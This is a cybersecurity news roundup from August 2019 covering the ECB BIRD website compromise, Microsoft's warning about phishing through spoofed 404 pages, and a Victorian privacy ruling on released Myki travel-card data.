Cyber Security News 16 August 2019 – European Central Bank BIRD Website Hacked – Microsoft Warns of New 404 Error Phishing Attacks – Public Transport Victoria Violated Privacy Laws
European Central Bank BIRD Website Hacked
Hackers again attacked a European Central Bank (ECB) website according to an ECB announcement. The compromised site is the Banks’ Integrated Reporting Dictionary known as BIRD. Malicious code was discovered during routine website maintenance. BIRD was shut down after the discovery. The email addresses, names and position titles of 481 BIRD newsletter subscribers may have been compromised.
ECB is a European cyber watchdog for the banking sector. BIRD is their external reporting website. It is used by every major European financial institution to file required oversight reports and data. Banks all fall under ECB’s reporting framework and are required to report any cyber attacks promptly.
In 2014 ECB was compromised. In that cyber attack, hackers stole about 20,000 email addresses as well as telephone numbers and addresses of ECB conference registrants. That data compromise was discovered after the hackers demanded a ransom in exchange for the stolen information.
Microsoft Warns of New 404 Error Phishing Attacks
Microsoft cyber security researchers warned of a new phishing attack. The new cyber attack uses spoofed custom 404 error pages to trick web users into entering their Microsoft login credentials on the fake web page. Custom 404 pages are web pages used by a website when a website user navigates to a non-existent web page or an web page that has been removed. Custom webpage are also known as known as page not found pages.
The spoofed custom 404 error pages look like legitimate Microsoft account sign-in pages. Even most of the links from the spoofed page link to legitimate Microsoft web pages. The only phishing links are the account Sign-in options link which is above the Next button and the cookies notification at the top of the page. The hackers created the spoofed web pages using free outlookloffice365user09ngxsmd[.]web[.]app Firebase subdomain to host an unlimited number of phishing scam pages. To accomplish this, the attackers register a domain and instead of creating a single phishing landing page to redirect their victims to, they configure a custom 404 page which shows the fake login form.
Public Transport Victoria Violated Privacy Laws
Australia’s Office of the Victorian Information Commissioner (OVIC) issued a compliance notice to Public Transport Victoria (PTV) for violating the Privacy and Data Protection Act 2014. OVIC states that it found that PTV violated public privacy laws by disclosing traveler information for a purpose for which it wasn’t collected and for failing to protect personal information.
Public Transport Victoria is part of the state’s Department of Transport.
Public Transport Victoria released three years of Myki travel card data covering the period between July 2015 and June 2018. Data from 1.8 billion travel records from 15.1 million Myki cards was given to the Melbourne Datathon. Myki is the state’s travel card used for buses, trams and trains. The Datathon is an event focused on finding innovative uses for data.
In the OVIC report, Data61, part of Australia’s CSIRO national research agency, stated there was “a high risk that some individuals may be re-identified by linking the data set with other information sources.”
The only security measure taken to anonymize and protect the identities of card holders was to remove their Myki card ID number from each record. Cyber security experts warned PTV that it would be possible to reconstruct the identities of individual card holders by coordinating other information. Data privacy researchers then set out to show how figuring out Australian’s travel records and whereabouts for three years could be accomplished. Trips taken on one card Myki are were linked along with the traveler’s location and precise time each time the card was tapped for entry to transportation. The type of transport card, which was not redacted, also gave insights into who was using it – categories include government officials as well as members of Parliament.